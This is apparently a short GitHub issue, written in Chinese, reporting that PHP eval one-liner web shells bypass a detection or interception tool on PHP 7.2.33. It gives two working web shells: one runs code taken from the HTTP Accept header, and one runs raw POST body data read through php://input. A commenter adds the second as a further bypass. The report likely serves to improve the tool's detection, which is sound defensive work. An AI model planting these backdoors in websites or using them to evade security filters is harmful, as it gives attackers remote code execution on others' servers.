5ibug opened this issue 2 years ago · 1 comments
php eval绕过拦截执行代码
PHP Version 7.2.33
一句话正常被拦截,但是header一句话就可以绕过拦截 <?php eval($_SERVER['HTTP_ACCEPT']); ?>
<?php eval($_SERVER['HTTP_ACCEPT']); ?>
补一个, 这个也可以 eval(file_get_contents("php://input")); 直接post raw
eval(file_get_contents("php://input"));